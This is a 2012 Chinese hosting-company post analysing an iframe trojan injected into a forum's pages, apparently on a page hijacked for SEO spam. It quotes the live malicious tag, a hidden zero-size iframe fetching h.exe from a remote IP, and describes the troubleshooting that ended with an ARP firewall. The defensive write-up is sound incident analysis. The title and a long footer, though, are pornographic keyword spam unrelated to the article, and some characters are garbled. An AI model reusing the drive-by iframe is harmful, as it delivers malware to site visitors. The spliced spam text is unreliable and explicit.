www.国产一区.com_成年毛片_欧美淫视频_97zyz成人免费视频_91网页在线观看_亚洲成人第一页

行業(yè)動態(tài)
服務器掛iframe木馬分析
發(fā)布日期:2012-11-26 閱讀次數:5679 字體大小:

  昨日接到某論壇的求助,論壇中被掛iframe木馬,當訪問論壇時發(fā)現(xiàn)每個頁面的置頂有個iframe木馬,代碼如下<iframe src= http://222.113.57.47:369/h.exe width=0 height=0></iframe> 360自動提示有木馬,系統(tǒng)會彈出一個載下h.exe的對話框。由于論壇是當天剛出現(xiàn)的情況,服務器中就放置了一個論壇,分析有可能有以下幾種情況。

  1.  論壇被攻擊
  2.  IIS被置入木馬
  3.  ARP攻擊

  針對第一種情況找到論壇中改過的文件與模板,并未發(fā)現(xiàn)相關被篡改的內容,第一種情況排除。接下來接以下兩種思路來尋找解決方法,在論壇中新建兩個文件,一個是1.html、一個是1.php 無需輸入內容。通過論壇網址訪問  網址/1.html 訪問此頁面沒發(fā)現(xiàn)異常、訪問1.php發(fā)現(xiàn)被自動掛馬,也就是說當運行PHP的文件時會自動掛馬,那么IIS被置入木馬的可能情就大些,(IIS被置入木馬分析:如PHP解析的文件被篡改,也會出現(xiàn)以上的情況)按IIS的配置進行查找也未發(fā)現(xiàn)問題。

  懷疑可能是服務器所在的局域網或網絡有ARP攻擊,從網上下載一個ARP防火墻后重啟服務器,發(fā)現(xiàn)問題解決,每個頁面中已經沒有iframe的木馬。訪問論壇首頁和原建立的1.php頁面也已正常。但訪問論壇子頁時360仍提示有木馬,但子頁的代碼已無iframe的內容。這種情況可能是論壇訪問過大,多用戶同時訪問子頁,360有云計算會將原有木馬的網站或頁面自動提交到云服務器中,以致及時清除木馬后360的云服務器還沒有反映過來才出現(xiàn)的誤報情況。

  在些易天科技提示服務器管理員除作好站點的安全防范外,應對服務器作相關的安全設置。安裝必要的軟件。

主站蜘蛛池模板: 国产午夜精品久久久 | 亚洲国产视频在线 | 色综合视频 | 在线男人天堂 | 欧美91看片特黄aaaa | 日本黄色免费观看视频 | 国产无遮挡一区二区三区毛片日本 | 韩国一级免费视频 | 亚洲第一黄色网 | 亚洲国产视频网 | 精品国产专区 | 国产三级在线视频观看 | av免费在线免费观看 | 精品国产96亚洲一区二区三区 | 久久亚洲精品国产一区 | www亚洲免费| 亚洲国产精品久久久 | 国产中文av在线 | 久久国产精品99国产 | 美国人成人在线视频 | 国内精品久久久久久久久久久久 | 色人阁导航 | 国产精品久久久久久久午夜片 | 福利在线国产 | 国产精品久久久在线观看 | 国产91中文字幕 | 91精品国产92久久久久 | 制服丝袜日日夜夜 | 久草视频福利在线观看 | 久在线观看福利视频69 | 色妹子久久| 免费观看黄色影片 | 欧美性猛交一区二区三区精品 | 成人在线视频黄色 | 国产成人精品一区在线播放 | 午夜电影视频 | 黄色片视频观看 | 亚洲成a人在线 | 欧美18一12sex性处hd | 国产91小视频在线观看 | 毛片视频大全 |